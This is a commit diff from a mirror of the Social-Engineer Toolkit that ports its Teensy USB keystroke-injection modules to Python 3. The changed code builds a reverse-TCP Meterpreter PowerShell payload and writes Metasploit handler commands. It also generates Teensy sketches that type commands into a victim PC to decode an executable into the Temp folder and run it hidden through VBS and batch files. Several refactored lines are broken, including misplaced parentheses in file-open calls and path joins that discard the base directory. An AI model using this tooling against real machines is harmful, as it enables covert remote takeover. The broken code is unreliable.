Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 14:56:08 +00:00
Code Issues Projects Releases Packages Wiki Activity

pep8 & python3 for teensy

Browse source
This commit is contained in:
Ryan Jarvis 2016-07-28 15:17:55 -07:00
parent a93d2c8e68
commit 129a6bf5ad
4 changed files with 452 additions and 297 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

361
src/teensy/binary2teensy.py
View file

File diff suppressed because one or more lines are too long

100
src/teensy/powershell_shellcode.py
View file

@ -1,8 +1,19 @@
#!/usr/bin/python
import pexpect
from src.core.setcore import *
# coding=utf-8
import os
import time
import pexpect
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
@ -13,45 +24,41 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode)
time.sleep(3)
fileopen = open(setdir + "/x86.powershell", "r")
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
pass
# read in x amount of bytes
data_read = int(50)
# read in x amount of bytes
data_read = int(50)
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
counter = 0
while True:
reading_encoded = fileopen.read(data_read).rstrip()
if not reading_encoded:
break
output_variable += "const char RevShell_{}[] PROGMEM = '{}';\n".format(counter, reading_encoded)
counter += 1
rev_counter = 0
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
output_variable += "RevShell_{}".format(rev_counter)
rev_counter += 1
if rev_counter == counter:
output_variable += "};\n"
if rev_counter != counter:
else:
output_variable += ",\n"
teensy = output_variable
@ -142,36 +149,39 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
print("[*] Payload has been extracted. Copying file to {}".format(os.path.join(core.setdir, "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
else:
port = input("Enter the port to connect back on: ")
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n"
"set payload {}\n"
"set LHOST {}\n"
"set LPORT {}\n"
"set AutoRunScript post/windows/manage/smart_migrate\n"
"exploit -j".format(payload, ipaddr, port))
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child = pexpect.spawn("{} -r {}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "metasploit.answers")))
child.interact()
except:
pass

143
src/teensy/sd2teensy.py
View file

@ -1,15 +1,14 @@
#!/usr/bin/python
import binascii
import base64
import sys
import binascii
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
@ -23,6 +22,13 @@ from src.core.menu.text import *
##########################################################################
##########################################################################
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# print main stuff for the application
print("""
********************************************************************
@ -48,43 +54,45 @@ print("""
enabled.\n""")
# grab the path and filename from user
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
fileopen = open(path, "rb")
data = fileopen.read()
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = open("converts.txt", "w")
filewrite.write(data)
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8, 15) + ".txt"
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
#
##########################################################################
@ -101,9 +109,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10, 15) + ".vbs"
vbs = core.generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10, 15) + ".bat"
bat = core.generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -118,9 +126,9 @@ void setup()
{
BlinkFast(2);
delay(5000);
CommandAtRunBar("cmd /c echo 0 > %%TEMP%%\\\\%s");
CommandAtRunBar("cmd /c echo 0 > %TEMP%\\\\{random_filename}");
delay(750);
CommandAtRunBar("notepad %%TEMP%%\\\\%s");
CommandAtRunBar("notepad %TEMP%\\\\{random_filename}");
delay(1000);
// Delete the 0
PRES(KEY_DELETE);
@ -132,11 +140,11 @@ void setup()
pinMode(10, OUTPUT);
// see if the card is present and can be initialized:
if (!SD.begin(chipSelect)) {
if (!SD.begin(chipSelect)) {{
Keyboard.println("Card failed, or not present");
// don't do anything more:
return;
}
}}
// open the file. note that only one file can be open at a time,
// so you have to close this one before opening another.
@ -147,15 +155,15 @@ void setup()
File dataFile = SD.open("converts.txt");
if (dataFile) {
fileSize = dataFile.size();
for (filePos = 0; filePos <= fileSize; filePos++) {
for (filePos = 0; filePos <= fileSize; filePos++) {{
Keyboard.print(dataFile.read(),BYTE);
delay(10);
}
}}
dataFile.close();
}
else {
}}
else {{
Keyboard.println("error opening converts.txt");
}
}}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -166,45 +174,45 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
Keyboard.println("powershell -EncodedCommand {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
Keyboard.println("echo %%TEMP%%\\\\%s.exe > %%TEMP%%\\\\%s");
Keyboard.println("wscript %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
Keyboard.println("echo Set WshShell = Nothing >> %TEMP%\\\\{vbs}");
Keyboard.println("echo %TEMP%\\\\{random_filename}.exe > %TEMP%\\\\{bat}");
Keyboard.println("wscript %TEMP%\\\\{vbs}");
delay(1000);
Keyboard.println("exit");
}
void loop () {}
}}
void loop () {{}}
void BlinkFast(int BlinkRate){
int BlinkCounter=0;
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){{
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}
}
void AltF4(){
}}
}}
void AltF4(){{
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F4);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
void CtrlS(){
}}
void CtrlS(){{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
}}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
void CommandAtRunBar(char *SomeCommand){{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
@ -217,24 +225,21 @@ void CommandAtRunBar(char *SomeCommand){
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void PRES(int KeyCode){
}}
void PRES(int KeyCode){{
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
subprocess.Popen("rm {} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
with open("teensy.pde", "w") as filewrite:
# write the teensy.pde file out
filewrite.write(output_variable)
print("""
Instructions:
@ -246,4 +251,4 @@ on.
Happy hacking.
""")
return_continue()
core.return_continue()

145
src/teensy/teensy.py
View file

@ -1,34 +1,44 @@
#!/usr/bin/env python
# coding=utf-8
############################
#
# Teensy HID Attack Vector
#
############################
import sys
import re
import os
import subprocess
import datetime
from src.core.setcore import *
import os
import re
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# pull metasploit path
msf_path = meta_path()
msf_path = core.meta_path()
# check operating system
operating_system = check_os()
operating_system = core.check_os()
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
definepath = os.getcwd()
# define if use apache or not
apache = 0
apache = False
# open set_config here
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
with open("/etc/setoolkit/set.config") as fileopen:
apache_check = fileopen.readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
@ -43,49 +53,50 @@ for line in apache_check:
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
apache = True
# grab info from config file
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
with open(os.path.join(core.setdir, "teensy")) as fileopen:
counter = 0
payload_counter = 0
choice = None
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter += 1
if not os.path.isfile(setdir + "/teensy"):
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set()
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
with open(os.path.join("src/teensy", filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{}.pde".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
@ -116,32 +127,44 @@ if choice == "13":
payload_counter = 0
# save our stuff here
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{}'".format(os.path.join(core.setdir, "reports", "teensy_{}.pde".format(now))) +
core.bcolors.ENDC)
print(core.bcolors.GREEN +
'[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' +
core.bcolors.ENDC)
print(core.bcolors.RED +
"\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" +
core.bcolors.ENDC)
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
webclone_path = os.path.join(core.setdir, "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
if not apache:
subprocess.Popen("mkdir {};"
"cp {} {} 1> /dev/null 2> /dev/null".format(webclone_path,
metasploit_exec_path,
os.path.join(webclone_path, "x.exe")),
shell=True).wait()
if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
else:
subprocess.Popen("cp {} %s/x.exe".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try:
if operating_system != "windows":
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1 = pexpect.spawn("{} -r {}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, "meta_config")))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
if not apache:
child.close()
child1.close()